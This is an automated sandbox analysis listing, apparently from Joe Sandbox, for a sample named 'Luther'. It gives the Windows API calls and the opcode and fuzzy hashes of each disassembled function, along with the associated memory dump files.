                                                                                                          • Opcode Fuzzy Hash: 4a15b92ef1eb8f6431816d51f65e8e9e250a3abd2e3f7013fabeb27c6b17aeb8
                                                                                                          • Instruction Fuzzy Hash: 0981A071208241AFC714DF24C885E6BBBE5FF84308F14946DF5596B2A2DB32ED06CB92
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(00000035), ref: 00E900A9
                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00E90150
                                                                                                          • VariantCopy.OLEAUT32(00E90354,00000000), ref: 00E90179
                                                                                                          • VariantClear.OLEAUT32(00E90354), ref: 00E9019D
                                                                                                          • VariantCopy.OLEAUT32(00E90354,00000000), ref: 00E901A1
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00E901AB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearCopy$AllocInitString
                                                                                                          • String ID:
                                                                                                          • API String ID: 3859894641-0
                                                                                                          • Opcode ID: 0d9fdde4c23c7dcb3b6b292afdf3e7232d93dfeaf1e3d6be703788d827bdbaed
                                                                                                          • Instruction ID: 384269f535c3d3c9e167c98a896b3dccb7df6912b23483b6748b95f745e63010
                                                                                                          • Opcode Fuzzy Hash: 0d9fdde4c23c7dcb3b6b292afdf3e7232d93dfeaf1e3d6be703788d827bdbaed
                                                                                                          • Instruction Fuzzy Hash: B451D631600310AECF24AB659889B69B3E5EF45310F64B857F906FF2A7DB709C44CB96
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E341EA: _wcslen.LIBCMT ref: 00E341EF
                                                                                                            • Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A
                                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00EA9F2A
                                                                                                          • _wcslen.LIBCMT ref: 00EA9F4B
                                                                                                          • _wcslen.LIBCMT ref: 00EA9F72
                                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00EA9FCA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$FileName$OpenSave
                                                                                                          • String ID: X
                                                                                                          • API String ID: 83654149-3081909835
                                                                                                          • Opcode ID: 5add0aa45d4b7926d5981e41ad77a5c312872f622bded84952a9f80834675606
                                                                                                          • Instruction ID: c9f4e8d4d73f537d681cde6192eccc2411ba9f34878eefafb259457eb5f1085d
                                                                                                          • Opcode Fuzzy Hash: 5add0aa45d4b7926d5981e41ad77a5c312872f622bded84952a9f80834675606
                                                                                                          • Instruction Fuzzy Hash: C7E194316043409FC714DF24C885B6ABBE1BF89314F14996DF989AB2A2DB31ED45CB92
                                                                                                          APIs
                                                                                                          • _wcslen.LIBCMT ref: 00EA6F21
                                                                                                          • CoInitialize.OLE32(00000000), ref: 00EA707E
                                                                                                          • CoCreateInstance.OLE32(00ED0CC4,00000000,00000001,00ED0B34,?), ref: 00EA7095
                                                                                                          • CoUninitialize.OLE32 ref: 00EA7319
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                          • String ID: .lnk
                                                                                                          • API String ID: 886957087-24824748
                                                                                                          • Opcode ID: 0389c9534edfea3fe55514bc0964c1662ff1b77efd36bb1a30c204ad4d756c29
                                                                                                          • Instruction ID: 8901b49d434f1bdaf00cd2aa7e978ea0de252833c88dc8c0529b668befea0992
                                                                                                          • Opcode Fuzzy Hash: 0389c9534edfea3fe55514bc0964c1662ff1b77efd36bb1a30c204ad4d756c29
                                                                                                          • Instruction Fuzzy Hash: A2D14A71608301AFC304EF24C885E6BBBE8FF99708F40596DF585AB261DB71E905CB92
                                                                                                          APIs
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00EA11B3
                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00EA11EE
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00EA120A
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00EA1283
                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00EA129A
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EA12C8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                          • String ID:
                                                                                                          • API String ID: 3368777196-0
                                                                                                          • Opcode ID: ef8321e4e14a15dc6798dcee26dc58fc9f8b00f27ef07910e52304a1f500617b
                                                                                                          • Instruction ID: 1d975cdf54e305cf413e35f0c09b29647ca101af006cc823b6069586286c34fe
                                                                                                          • Opcode Fuzzy Hash: ef8321e4e14a15dc6798dcee26dc58fc9f8b00f27ef07910e52304a1f500617b
                                                                                                          • Instruction Fuzzy Hash: 91418A71901204AFDF049F54DD85AAAB7B8FF08304F1484B5FD00AE2A6D731EE55DBA0
                                                                                                          APIs
                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00E8FBEF,00000000,?,?,00000000,?,00E739E2,00000004,00000000,00000000), ref: 00EC8CA7
                                                                                                          • EnableWindow.USER32(?,00000000), ref: 00EC8CCD
                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00EC8D2C
                                                                                                          • ShowWindow.USER32(?,00000004), ref: 00EC8D40
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 00EC8D66
                                                                                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00EC8D8A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 642888154-0
                                                                                                          • Opcode ID: a262fff79b64f2d488c96b6d4b700bd8395adc342ec00ef7fe1a68db218e65cd
                                                                                                          • Instruction ID: a573c35201676012e09ec9a6851fab18ea86d70ecc398435187cf621b933006e
                                                                                                          • Opcode Fuzzy Hash: a262fff79b64f2d488c96b6d4b700bd8395adc342ec00ef7fe1a68db218e65cd
                                                                                                          • Instruction Fuzzy Hash: 4441C630601248AFDB25CF24DB99FA57BF0FB45308F14106DE5096B1A2CB335847DB61
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32(?,?,00000000), ref: 00EB2D45
                                                                                                            • Part of subcall function 00EAEF33: GetWindowRect.USER32(?,?), ref: 00EAEF4B
                                                                                                          • GetDesktopWindow.USER32 ref: 00EB2D6F
                                                                                                          • GetWindowRect.USER32(00000000), ref: 00EB2D76
                                                                                                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00EB2DB2
                                                                                                          • GetCursorPos.USER32(?), ref: 00EB2DDE
                                                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EB2E3C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                          • String ID:
                                                                                                          • API String ID: 2387181109-0
                                                                                                          • Opcode ID: 6f153b9f5dc34209f52966f5645d8096816387d719c62da88b0e75d623cf0a6f
                                                                                                          • Instruction ID: 6e38444f3c6e579b89e84c5c0dc625d6d187f3f74d589603345894f4c17f346b
                                                                                                          • Opcode Fuzzy Hash: 6f153b9f5dc34209f52966f5645d8096816387d719c62da88b0e75d623cf0a6f
                                                                                                          • Instruction Fuzzy Hash: 2D31EF72509315AFC720DF148C45F9BB7A9FF88358F00092EF989A7181DB31E909CB92
                                                                                                          APIs
                                                                                                          • IsWindowVisible.USER32(?), ref: 00E955F9
                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E95616
                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E9564E
                                                                                                          • _wcslen.LIBCMT ref: 00E9566C
                                                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E95674
                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 00E9567E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                          • String ID:
                                                                                                          • API String ID: 72514467-0
                                                                                                          • Opcode ID: 7f5a52fdb18b4e0fc25bdba717a7364851d5d4686154463d786abc279bcc76e8
                                                                                                          • Instruction ID: 6b25fb6d70cecfc146b6bdb3565216648128daa91abc4acb27eece9a5d31c054
                                                                                                          • Opcode Fuzzy Hash: 7f5a52fdb18b4e0fc25bdba717a7364851d5d4686154463d786abc279bcc76e8
                                                                                                          • Instruction Fuzzy Hash: 5B210473204600BBEF165B259C49E7B7BA8DF45710F14503AFC05EA092EA62DC418760
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E35851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E355D1,?,?,00E74B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E35871
                                                                                                          • _wcslen.LIBCMT ref: 00EA62C0
                                                                                                          • CoInitialize.OLE32(00000000), ref: 00EA63DA
                                                                                                          • CoCreateInstance.OLE32(00ED0CC4,00000000,00000001,00ED0B34,?), ref: 00EA63F3
                                                                                                          • CoUninitialize.OLE32 ref: 00EA6411
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                          • String ID: .lnk
                                                                                                          • API String ID: 3172280962-24824748
                                                                                                          • Opcode ID: b22f301b0e32614b851e605d930b3f3537f11866c239d82395a3603bfc2ba7c2
                                                                                                          • Instruction ID: 266ed61c7bfa36b621873be6d7f8072d074ac14cb2e0febf41a3f693060d8be1
                                                                                                          • Opcode Fuzzy Hash: b22f301b0e32614b851e605d930b3f3537f11866c239d82395a3603bfc2ba7c2
                                                                                                          • Instruction Fuzzy Hash: 0CD11475A043019FCB14DF15C584A2ABBF5FF8A714F189859F885AB361CB31EC49CB92
                                                                                                          APIs
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00EC8740
                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00EC8765
                                                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EC877D
                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00EC87A6
                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00EAC1F2,00000000), ref: 00EC87C6
                                                                                                            • Part of subcall function 00E3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E324B0
                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00EC87B1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long$MetricsSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 2294984445-0
                                                                                                          • Opcode ID: a14b9e7b2e3b6a394cc984e1323c25f9cdb6e3c461c4669242b34afa08ee25b6
                                                                                                          • Instruction ID: c0a58bbb3c551c07e19472c2a023e5ae6dd64a127a6183c87331a55474803b6c
                                                                                                          • Opcode Fuzzy Hash: a14b9e7b2e3b6a394cc984e1323c25f9cdb6e3c461c4669242b34afa08ee25b6
                                                                                                          • Instruction Fuzzy Hash: 232181716142459FCB145F39CF08F6A37A5FB45329F25563EF926E21E0EA328852DB10
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(?,?,00E536E9,00E53355), ref: 00E53700
                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E5370E
                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E53727
                                                                                                          • SetLastError.KERNEL32(00000000,?,00E536E9,00E53355), ref: 00E53779
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                          • String ID:
                                                                                                          • API String ID: 3852720340-0
                                                                                                          • Opcode ID: 8879c9cb419dc9e12fd25ea25e3843c28381b1bbce2cd0fe11b99fe35e5158b6
                                                                                                          • Instruction ID: 2125832980839f73866a680b9ace827f89eb8bb63f7da79462588fa2fe313a4f
                                                                                                          • Opcode Fuzzy Hash: 8879c9cb419dc9e12fd25ea25e3843c28381b1bbce2cd0fe11b99fe35e5158b6
                                                                                                          • Instruction Fuzzy Hash: C90149B290D7112EE62416756C8156B2AD5D7487F77202A3AF810700E1EE124D0EA144
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(?,00000000,00E54D53,00000000,?,?,00E568E2,?,?,00000000), ref: 00E630EB
                                                                                                          • _free.LIBCMT ref: 00E6311E
                                                                                                          • _free.LIBCMT ref: 00E63146
                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000), ref: 00E63153
                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000), ref: 00E6315F
                                                                                                          • _abort.LIBCMT ref: 00E63165
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                          • String ID:
                                                                                                          • API String ID: 3160817290-0
                                                                                                          • Opcode ID: 2e9dc0463ea0e1f294060d126e630ae5afc5f59375e2eb2459da322780a86894
                                                                                                          • Instruction ID: 865e9975d518755d029e6ab71ecbcfaf372c9983552ca773d44a9a4090f2a464
                                                                                                          • Opcode Fuzzy Hash: 2e9dc0463ea0e1f294060d126e630ae5afc5f59375e2eb2459da322780a86894
                                                                                                          • Instruction Fuzzy Hash: 82F0F2765C69012BC2113739BC0AE5E169A9FD37F5B213538FA24F22D2EF358E075161
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E31F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E31F87
                                                                                                            • Part of subcall function 00E31F2D: SelectObject.GDI32(?,00000000), ref: 00E31F96
                                                                                                            • Part of subcall function 00E31F2D: BeginPath.GDI32(?), ref: 00E31FAD
                                                                                                            • Part of subcall function 00E31F2D: SelectObject.GDI32(?,00000000), ref: 00E31FD6
                                                                                                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00EC94AA
                                                                                                          • LineTo.GDI32(?,00000003,00000000), ref: 00EC94BE
                                                                                                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00EC94CC
                                                                                                          • LineTo.GDI32(?,00000000,00000003), ref: 00EC94DC
                                                                                                          • EndPath.GDI32(?), ref: 00EC94EC
                                                                                                          • StrokePath.GDI32(?), ref: 00EC94FC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                          • String ID:
                                                                                                          • API String ID: 43455801-0
                                                                                                          • Opcode ID: 4dae1949934c04d375481d73195438739676a998bbfc2e4314e1195d42bca13e
                                                                                                          • Instruction ID: a7f19a33f42cd27fceb4f048ec3019ea4fb9f188ea3ec0965e138f63de1dd2cf
                                                                                                          • Opcode Fuzzy Hash: 4dae1949934c04d375481d73195438739676a998bbfc2e4314e1195d42bca13e
                                                                                                          • Instruction Fuzzy Hash: B6111B7600410DBFDF029F95DC89E9A7F6DEF08364F048025BE196A161C7729D56DBA0
                                                                                                          APIs
                                                                                                          • GetDC.USER32(00000000), ref: 00E95B7C
                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E95B8D
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E95B94
                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00E95B9C
                                                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E95BB3
                                                                                                          • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00E95BC5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDevice$Release
                                                                                                          • String ID:
                                                                                                          • API String ID: 1035833867-0
                                                                                                          • Opcode ID: ed14abbdcd4a563d56d3f61d29ab22ece0b47f84b5b3fbfde37e9747df8e38c1
                                                                                                          • Instruction ID: e3337102bd7eb12394eda2a91029711d23ef89899737e25aab032535253be35e
                                                                                                          • Opcode Fuzzy Hash: ed14abbdcd4a563d56d3f61d29ab22ece0b47f84b5b3fbfde37e9747df8e38c1
                                                                                                          • Instruction Fuzzy Hash: 8B012CB5A04718BFEF119BAA9C49F4EBFA8EB48751F044075EA09B7280D6719805CFA0
                                                                                                          APIs
                                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E332AF
                                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E332B7
                                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E332C2
                                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E332CD
                                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E332D5
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E332DD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Virtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4278518827-0
                                                                                                          • Opcode ID: f86342649d491d352f990c1ac8df5254de802af28f82445e0b127bcacbdc377d
                                                                                                          • Instruction ID: 2c50d8f889a56de5b353770f004b0eba5079f934188a85e424ca8eec55c69315
                                                                                                          • Opcode Fuzzy Hash: f86342649d491d352f990c1ac8df5254de802af28f82445e0b127bcacbdc377d
                                                                                                          • Instruction Fuzzy Hash: BD016CB09017597DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E9F447
                                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E9F45D
